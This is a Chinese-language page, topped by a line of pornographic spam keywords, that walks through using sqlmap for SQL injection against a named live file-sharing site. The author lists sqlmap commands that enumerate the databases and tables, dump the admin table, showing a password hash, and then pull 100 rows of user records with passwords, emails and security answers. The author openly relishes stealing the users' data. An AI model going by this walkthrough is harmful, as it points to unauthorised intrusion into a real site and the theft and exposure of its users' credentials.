丰满人妻久久久久久久,亚洲图片在线,av韩国三级在线一区

SQLMAP是一款開(kāi)源的滲透測(cè)試程序，它可以自動(dòng)探測(cè)和利用SQL注入漏洞來(lái)獲得我們想要的數(shù)據(jù)。我們可以利用它執(zhí)行特定的命令、查看文件、獲取各種數(shù)據(jù)；當(dāng)然，最猥瑣的是它利用注入點(diǎn)拖庫(kù)的速率還是灰常讓人滿意的。

滲透開(kāi)始-->

注入點(diǎn):"http://so.126disk.com/search?key=A"

測(cè)試環(huán)境:?BackTrack?5??/???SQLMAP?0.9

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dbs

//?列舉數(shù)據(jù)庫(kù)?-->?126disk?,?information_schema

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--current-db

//?當(dāng)前數(shù)據(jù)庫(kù)?-->?126disk

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--users

//?列數(shù)據(jù)庫(kù)用戶

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--current-user

//?當(dāng)前用戶

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--tables?-D?"126disk"

//?列舉數(shù)據(jù)庫(kù)126disk的表名

獲取表名

+---------------------+

disk_admin

disk_adminlog

disk_adminmsg

disk_collection

disk_count

disk_file

disk_gonggao

disk_guolv

disk_haoyou

disk_integral

disk_integrallog

disk_jubao

disk_link

disk_links

disk_message

disk_mulu

disk_search

disk_server

disk_tag

disk_type

disk_user

disk_userlog

disk_visitors

disk_zhuanji

+----------------------+

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--columns?-T?"disk_admin"?-D?"126disk"

//?獲取表disk_admin的列名

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dump?-C?"id,login,pass,user"?-T?"disk_admin"?-D?"126disk"

//?獲取表disk_admin中的數(shù)據(jù)，包含列?id,login,pass,user???-->?1|9|admin|8e8df10cbce2ef46c3d25c3a5f7fe159

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--columns?-T?"disk_user"?-D?"126disk"

//?獲取表disk_user的列名

當(dāng)看到這些列名時(shí)，心中是莫名的激動(dòng)。里面可都是注冊(cè)用戶的數(shù)據(jù)啊

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dump?-C?"id,name,pass,email,wenti,daan"?-T?"disk_user"?-D?"126disk"?--start?1?--stop?100

//?獲取表disk_user的前100條數(shù)據(jù)，包含id,name,pass,email,wenti,daan；這里已經(jīng)開(kāi)始拖庫(kù)了